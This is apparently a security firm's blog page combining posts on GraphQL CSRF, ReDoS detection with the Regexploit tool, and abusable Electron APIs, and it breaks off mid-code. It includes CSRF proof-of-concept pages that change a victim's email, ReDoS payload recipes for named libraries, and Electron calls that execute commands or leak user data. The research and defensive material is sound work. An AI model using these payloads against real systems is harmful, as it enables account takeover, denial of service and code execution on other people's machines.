ABOUT US

We are security engineers who break bits and tell stories.

© 2026 Doyensec LLC

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing our line of business - just having fun with computers!

We believe that the greatest lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle, we’re always challenging ourselves to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to join forces to design and develop a casual mobile game set in *cyber* space. After many prototypes and changes of direction, we spent a good portion of our spare time in 2020 working on the core mechanics and graphics. Unfortunately, limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite it all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play game with no advertisements. We hope you’ll enjoy the game during your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

While playing, you might end up talking to John or Luca.

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept only requests with the Content-Type header set to application/json, which is widely believed to be invulnerable to CSRF. However, multiple layers of middleware may translate incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), so GraphQL implementations are often affected by CSRF anyway. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers incorrectly forgo implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1

Host: redacted

Connection: close

Content-Length: 100

accept: */*

User-Agent: ...

content-type: application/json

Referer: https://redacted/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: ...

{"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}

It is common, due to middleware magic, for a server to accept the same request as a form-urlencoded POST request:

POST /graphql HTTP/1.1

Host: redacted

Connection: close

Content-Length: 72

accept: */*

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: https://redacted

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A



A seasoned Burp user can quickly convert this request to a CSRF PoC through Engagement Tools > Generate CSRF PoC:

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<script>history.pushState('', '', '/')</script>

<form action="https://redacted/graphql" method="POST">

<input type="hidden" name="query" value="{   user {     firstName     __typename   } } " />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the application layer that receives the request, any other query can be issued the same way, including mutations.
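To make the equivalence between the two request bodies concrete, here is a minimal Python sketch that decodes both bodies shown earlier and compares the resulting GraphQL query. The helper names (`normalize`, `query_from_json`, `query_from_form`) are made up for this illustration, and whitespace is collapsed before comparing because indentation does not change the meaning of the query.

```python
import json
from urllib.parse import parse_qs

# Bodies copied from the two requests shown earlier in this post.
json_body = r'{"operationName":null,"variables":{},"query":"{\n user {\n firstName\n __typename\n }\n}\n"}'
form_body = "query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A"


def normalize(query):
    """Collapse whitespace so that only the GraphQL tokens are compared."""
    return " ".join(query.split())


def query_from_json(body):
    """Extract the query the way a JSON body parser would."""
    return json.loads(body)["query"]


def query_from_form(body):
    """Extract the query the way a urlencoded body parser would."""
    # parse_qs decodes both percent-escapes and '+' (space) characters.
    return parse_qs(body)["query"][0]


json_query = normalize(query_from_json(json_body))
form_query = normalize(query_from_form(form_body))
print(json_query)
print(json_query == form_query)
```

If a middleware layer performs the second kind of parsing before the request reaches the GraphQL handler, the handler sees the same operation either way, which is what makes the HTML form PoC work.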

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.



For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.

While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wide.

For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:

<!DOCTYPE html>

<html>

<head>

<title>GraphQL CSRF file upload</title>

</head>

<body>

<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!)%20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType)%20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>

</body>

</html>

The second issue arises when a state-changing GraphQL operation is misplaced among the queries, which are normally non-state-changing. In fact, most GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issue is trivial, and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.
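As a rough illustration of that kind of triage (this is not the tool mentioned above), the following sketch flags query names whose first word looks like a state-changing verb. The verb list and the function names are assumptions made for this example; a real review would still need to confirm what each flagged query actually does.

```python
import re

# Hypothetical verb list that hints at a state change; tune it per target.
STATE_CHANGING_VERBS = ("set", "update", "delete", "remove", "create", "add", "reset")


def split_words(name):
    """Split camelCase, PascalCase and snake_case identifiers into lowercase words."""
    spaced = re.sub(r"([a-z0-9])([A-Z])", r"\1 \2", name).replace("_", " ")
    return spaced.lower().split()


def suspicious_queries(query_names):
    """Return the query names whose first word is a state-changing verb."""
    flagged = []
    for name in query_names:
        words = split_words(name)
        if words and words[0] in STATE_CHANGING_VERBS:
            flagged.append(name)
    return flagged


names = ["user", "SetUserEmail", "isEmailAvailable", "delete_file", "settings"]
print(suspicious_queries(names))
```

Matching on whole words rather than raw prefixes avoids flagging harmless names such as `settings`.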

During an engagement, we discovered the following query that was issuing a state changing operation:

req := graphql.NewRequest(`

query SetUserEmail($email: String!) {

SetUserEmail(user_email: $email) {

id

email

}

}

`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>

<html>

<head>

<title>GraphQL CSRF - State Changing Query</title>

</head>

<body>

<iframe width="1000" height="1000" src="https://victimhost.com/?query=query%20SetUserEmail%28%24email%3A%20String%21%29%20%7B%0A%20%20SetUserEmail%28user_email%3A%20%24email%29%20%7B%0A%20%20%20%20id%0A%20%20%20%20email%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22id%22%3A%20%22441%22%2C%0A%20%20%22email%22%3A%20%22attacker%40email.xyz%22%0A%7D"></iframe>

</body>

</html>
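A URL of this shape does not have to be encoded by hand. The sketch below assembles it with Python's standard library, assuming the endpoint reads `query` and `variables` from the query string. The `build_get_url` helper is a name invented for this example, and only the `$email` variable is passed, since it is the only one the query declares.

```python
import json
from urllib.parse import urlencode, urlsplit, parse_qs, quote

query = """query SetUserEmail($email: String!) {
  SetUserEmail(user_email: $email) {
    id
    email
  }
}
"""
variables = {"email": "attacker@email.xyz"}


def build_get_url(endpoint, query, variables):
    """Encode a GraphQL operation as two separate query-string parameters."""
    params = {"query": query, "variables": json.dumps(variables)}
    # quote_via=quote emits %20 for spaces instead of '+'.
    return endpoint + "?" + urlencode(params, quote_via=quote)


url = build_get_url("https://victimhost.com/", query, variables)
decoded = parse_qs(urlsplit(url).query)
print(url)
```

Note that the `&` separating the two parameters must stay unencoded. If it is percent-encoded, the server receives a single `query` parameter containing the variables text as well.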

Despite the most frequently used GraphQL servers/libraries having some sort of protection against CSRF, we have found that in some cases developers bypass the CSRF protection mechanisms. For example, if graphene-django is in use, there is an easy way to deactivate the CSRF protection on a particular GraphQL endpoint:

urlpatterns = patterns(

# ...

url(r'^graphql', csrf_exempt(GraphQLView.as_view(graphiql=True))),

# ...

)

Some browsers, such as Chrome, recently defaulted cookie behavior to be equivalent to SameSite=Lax, which protects from the most common CSRF vectors.

Other prevention methods can be implemented within each application. The most common are:

Not using GET requests for state-changing operations

Extending CSRF protection to GET requests too

There isn’t necessarily a single best option for every application. Determining the best protection requires evaluating the specific environment on a case-by-case basis.
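As an illustration of restricting what reaches the GraphQL handler, here is a minimal, framework-agnostic sketch of a request gate. The function names are hypothetical and the mutation check is deliberately naive. It assumes that POST bodies are only honoured when declared as application/json and that GET is reserved for read-only operations.

```python
def is_mutation(query):
    """Very rough check: does the operation text start with the 'mutation' keyword?"""
    return query.lstrip().startswith("mutation")


def allow_graphql_request(method, content_type, query):
    """Return True only for request shapes this sketch considers acceptable."""
    method = method.upper()
    media_type = content_type.split(";", 1)[0].strip().lower()
    if method == "POST":
        # HTML forms can only send urlencoded, multipart or text/plain bodies,
        # so refusing everything except JSON blocks the form-based PoC.
        return media_type == "application/json"
    if method == "GET":
        # Read-only queries may be allowed over GET; mutations never are.
        return not is_mutation(query)
    return False


print(allow_graphql_request("POST", "application/x-www-form-urlencoded", "{ user { firstName } }"))
print(allow_graphql_request("GET", "", "mutation AddFile { id }"))
```

A gate like this does nothing for state-changing operations that were declared as queries, so it complements rather than replaces token-based or origin-based CSRF protection. A production check should also parse the operation properly instead of inspecting its first keyword.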

In XS-Search attacks, an attacker leverages a CSRF vulnerability to force a victim to request data the attacker can’t access themselves. The attacker then compares response times to infer whether the request was successful or not.

For example, if there is a CSRF vulnerability in the file search function and the attacker can make the admin visit that page, they could make the victim search for filenames starting with specific values, to confirm their existence or accessibility.
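The search logic behind such an attack can be sketched independently of the timing measurement. In the following simulation, `simulated_oracle` stands in for "force the victim to run a prefix search and infer from the response time whether anything matched". It and the file names are invented for this example.

```python
import string


def enumerate_names(oracle, alphabet=string.ascii_lowercase, max_len=8):
    """Depth-first search over prefixes, keeping only those the oracle confirms."""
    found = []
    stack = [""]
    while stack:
        prefix = stack.pop()
        extended = False
        if len(prefix) < max_len:
            for ch in alphabet:
                candidate = prefix + ch
                if oracle(candidate):  # one forced cross-site request per call
                    stack.append(candidate)
                    extended = True
        if prefix and not extended:
            found.append(prefix)  # no longer prefix matched: treat as complete
    return sorted(found)


# Stand-in oracle: in a real attack this answer would be inferred from timing.
SECRET_FILES = ["budget", "backup", "notes"]


def simulated_oracle(prefix):
    return any(name.startswith(prefix) for name in SECRET_FILES)


print(enumerate_names(simulated_oracle))
```

Each confirmed prefix costs at most one request per alphabet character, so the number of requests grows with the length of the secret rather than with the size of the search space.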

Applications which accept GET requests for complex urlencoded queries and demonstrate a general misunderstanding of CSRF protection on their GraphQL endpoints represent the perfect target for XS-Search attacks.

XS-Search is quite a neat and simple technique which can transform the following query into an attacker-controlled binary search (e.g. we can enumerate the users of a private platform):

query {

isEmailAvailable(email:"foo@bar.com") {

is_email_available

}

}

In HTTP GET form:

GET /graphql?query=query+%7B%0A%09isEmailAvailable%28email%3A%22foo%40bar.com%22%29+%7B%0A%09%09is_email_available%0A%09%7D%0A%7D HTTP/1.1

Accept-Encoding: gzip, deflate

Connection: close

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0

Host: redacted

Content-Length: 0

Content-Type: application/json

Cookie: ...

The implications of a successful XS-Search attack on a GraphQL endpoint cannot be overstated. However, as previously mentioned, CSRF-based issues can be successfully mitigated with some effort.

As much as we love finding bugs the hard way, we believe that automation is the only way to democratize security and provide the best service to the community.

For this reason and in conjunction with this research, we are releasing a new major version of our GraphQL InQL Burp extension.

InQL v4 can assist in detecting these issues:

By identifying various classes of CSRF through new “Send to Repeater” helpers:

GET query parameters

POST form-data

POST x-form-urlencoded

By improving the query generation

We tested for the aforementioned vulnerabilities in some of the top companies that make use of GraphQL. While the research on these ~30 endpoints lasted only two days and no conclusiveness nor completeness should be inferred, numbers show an impressive amount of unpatched vulnerabilities:

TL;DR: Cross Site Request Forgery is here to stay for a few more years, even if you use GraphQL!

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.

$1="123.456.789".

The matcher then looks for a literal dot character.

Unable to find it, it tries removing one character at a time from the first .+

until it successfully matches a dot - $1="123.456"

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.
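The end result of that walk-through can be checked with Python's `re` module. This small sketch (the `split_version` helper is a name made up here) also shows how the ambiguity surfaces when the input contains more dots than expected: the greedy first group keeps everything it can.

```python
import re

VERSION_RE = re.compile(r"(.+)\.(.+)\.(.+)")


def split_version(text):
    """Return the three captured groups, or None if the text does not match."""
    match = VERSION_RE.fullmatch(text)
    return match.groups() if match else None


for text in ["123.456.789", "1.2.3.4", "no-dots-here"]:
    print(text, "->", split_version(text))
```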

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019.

In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [^\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [^\);]+ and [^\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis.

The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).
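The ½(N-1)N figure can be checked by brute force, and the effect on matching time can be observed with small inputs. The following sketch uses Python's `re` module with the pattern quoted above. The helper names are made up for this example, and the absolute timings will vary by machine.

```python
import re
import time

UA_RE = re.compile(r"; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)")


def count_splits(n):
    """Count the ways n digits can be divided between the three repeating groups."""
    total = 0
    for a in range(1, n + 1):          # digits taken by the first group (at least one)
        for b in range(1, n - a + 1):  # digits taken by the second group (at least one)
            total += 1                 # the remainder goes to the third group (may be empty)
    return total


def time_failed_match(n):
    """Time a non-matching input with n trailing digits and no closing parenthesis."""
    payload = ";0 Build/HuaweiA" + "0" * n
    start = time.perf_counter()
    result = UA_RE.search(payload)
    elapsed = time.perf_counter() - start
    assert result is None  # the missing ')' forces the engine to try every split
    return elapsed


for n in (50, 100, 200):
    print(n, count_splits(n), f"{time_failed_match(n):.4f}s")
```

The input sizes are kept small on purpose. The running time grows roughly with the cube of N, so payloads of a few thousand digits take orders of magnitude longer.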

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging.

Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts.

Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)

Repeated character: [[0-9]]

Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/

Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190

Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')

---

Starriness: 3 ⭐⭐⭐ (cubic)

Repeated character: [20,09,0a,0d]

Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba( 100,200, 10, 0.5 ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces.

If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^

(\d\d?) # day

(?:\s+|[-\/])

(\w+) # month

(?:\s+|[-\/])

(\d+) # year

(?:

(?:\s+|:) # separator before clock

(\d\d?):(\d\d) # hour:min

(?::(\d\d))? # optional seconds

)? # optional clock

\s*

([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone

\s*

(?:\(\w+\))? # ASCII representation of timezone in parens.

\s*$

Context: LOOSE_HTTP_DATE_RE = re.compile(

---

Starriness: 3 ⭐⭐⭐

Repeated character: [SPACE]

Final character to cause backtracking: [^SPACE]

Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats.

The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1 X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

Sorry, I wanted to shoehorn this comic in somewhere


So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input.

There was a trade-off though.

Depending on your use-case, libraries like re2 may not be the fastest engines.

There are also some regex features such as backreferences which had to be dropped.

But in the pathological case, regexes won’t be what takes down your website.

There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.
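Applied to the rgba example from earlier, that approach could look like the sketch below. The pattern and the `extract_rgba_args` helper are hypothetical and are not the fix that CairoSVG shipped. The idea is that the regex no longer tries to handle whitespace at all, so no character can be claimed by more than one repeating group.

```python
import re

# Hypothetical replacement pattern: no whitespace handling inside the regex.
RGBA_SIMPLE = re.compile(r"rgba\(([^)]*)\)")


def extract_rgba_args(text):
    """Return the text between 'rgba(' and ')', trimmed, or None if absent."""
    match = RGBA_SIMPLE.search(text)
    if match is None:
        return None
    inner = match.group(1).strip(" \n\r\t")
    return inner or None


print(extract_rgba_args("rgba( 100,200, 10, 0.5 )"))
print(extract_rgba_args("rgba(" + " " * 3456))
```

With a single repeating group, a non-matching input is rejected after one linear pass instead of a cubic number of backtracking attempts.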

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”.

While the http-cookie gem has many more lines of code than a mega-regex, it avoids ReDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack.

In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.

ElectronJs is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending the somewhat deserved reputation of a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years we’ve committed to helping developers secure their applications by researching different attack surfaces:

As confirmed by the Electron development team in the v11 stable release, they plan to release new major versions of Electron (including new versions of Chromium, Node, and V8) approximately quarterly. Such an ambitious versioning schedule will also increase the number and the frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionalities are certainly desirable, new framework APIs may also expose powerful interfaces to OS features, which may be more or less inadvertently enabled by developers falling for the syntactic sugar provided by Electron.

Such interfaces may be exposed to the renderer, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command utility and will open the specific application based on the URI and filetype association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron')

shell.openExternal('file:///System/Applications/Calculator.app')

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.
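One way to reason about what should ever reach such a primitive is a scheme allow-list applied before the call. The logic is sketched below in Python for brevity; in an Electron application the equivalent check would live in the JavaScript that wraps openExternal. The allowed schemes and the `is_safe_external_url` name are assumptions made for this example.

```python
from urllib.parse import urlsplit

# Assumption: this application only ever needs to hand off web and e-mail links.
ALLOWED_SCHEMES = {"https", "mailto"}


def is_safe_external_url(url):
    """Return True if the URL uses an explicitly allowed scheme."""
    try:
        scheme = urlsplit(url).scheme.lower()
    except ValueError:
        return False
    return scheme in ALLOWED_SCHEMES


print(is_safe_external_url("https://doyensec.com"))
print(is_safe_external_url("file:///System/Applications/Calculator.app"))
```

An allow-list is preferable to a deny-list here, because the set of protocol handlers registered on a user's machine is open-ended.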

From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user’s data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing Remote.app to the renderer. The app object controls the full application’s event lifecycle and it is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused, including but not limited to:

app.relaunch([options]): Relaunches the app when the current instance exits.

app.setAppLogsPath([path]): Sets or creates a directory for your app’s logs, which can then be manipulated with app.getPath() or app.setPath(pathName, newPath).

app.setAsDefaultProtocolClient(protocol[, path, args]): Sets the current executable as the default handler for a specified protocol.

app.setUserTasks(tasks): Adds tasks to the Tasks category of the Jump List (Windows only).

app.importCertificate(options, callback): Imports the certificate in pkcs12 format into the platform certificate store (Linux only).

app.moveToApplicationsFolder([options]): Moves the application to the default Applications folder (Mac only).

app.setJumpList(categories): Sets or removes a custom Jump List for the application (Windows only).

app.setLoginItemSettings(settings): Sets executables to launch at login with their options (Mac, Windows only).

Taking the first function by way of example, app.relaunch([options]) can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including an execPath property that will be executed for relaunch instead of the current app, along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands.

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});

Native.app.exit()

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.

Another frequently exported module is systemPreferences. This API is used to get the system preferences and emit system events, and can therefore be abused to leak multiple pieces of information on the user’s behavior and their operating system activity and usage patterns. The metadata extracted through the module could then be abused to mount targeted attacks.

These methods could be used to subscribe to native notifications of macOS. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The callback specified would be invoked anytime a distributed notification is broadcasted by any app. Following the release of macOS Catalina or Big Sur, in the case of sandboxed applications it is still possible to globally sniff distributed notifications by registering to receive any notification by name. As a result, many sensitive events can be sniffed, including but not limited to:

The latest NSDistributedNotificationCenter API also seems to be having intermittent problems with Big Sur and sandboxed applications, so we expect to see more breaking changes in the future.

The getUserDefault function returns the value of key in NSUserDefaults, a macOS simple storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to return the Application’s or Global’s Preferences. An attacker may abuse the API to retrieve sensitive information including the user’s location and filesystem resources. As a matter of demonstration, getUserDefault can be used to obtain personal details of the targeted application user:

> Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")

(5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/blog.doyensec.com/_posts", "~/Desktop/Invoices"]

Native.systemPreferences.getUserDefault("com.apple.TimeZonePref.Last_Selected_City","array")

(10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]

Complementarily, the setUserDefault method can be weaponized to set the user defaults for the preferences of the target application. Before Electron v8.3.0 [1], [2], these methods could only get or set NSUserDefaults keys in the standard suite.



A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.

Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/platform_util_linux.cc), Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {

base::FilePath dir = full_path.DirName();

if (!base::DirectoryExists(dir))

return;

XDGOpen(dir.value(), false, platform_util::OpenCallback());

}

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (https://linux.die.net/man/1/xdg-open)

Because of the inherent time-of-check to time-of-use (TOCTOU) condition caused by the time difference between the directory existence check and its launch with xdg-open, an attacker could run an executable of choice by replacing the folder path with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to exploit in the context of an insecure Electron renderer, it is certainly a potential step in a more complex vulnerability chain.
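The general way to close this kind of gap is to make the check and the use a single operation. The sketch below illustrates the principle in Python on a POSIX system, using the `O_DIRECTORY` open flag so that the kernel itself refuses anything that is not a directory. It is not how Electron or Chromium addressed the issue, and the `open_directory_atomically` name is invented for this example.

```python
import os
import tempfile


def open_directory_atomically(path):
    """Open path only if it is a directory, in a single system call.

    Raises NotADirectoryError if the path is (or has been swapped for) a file.
    """
    return os.open(path, os.O_RDONLY | os.O_DIRECTORY)


with tempfile.TemporaryDirectory() as tmp:
    fd = open_directory_atomically(tmp)       # a real directory: succeeds
    os.close(fd)

    file_path = os.path.join(tmp, "not_a_dir")
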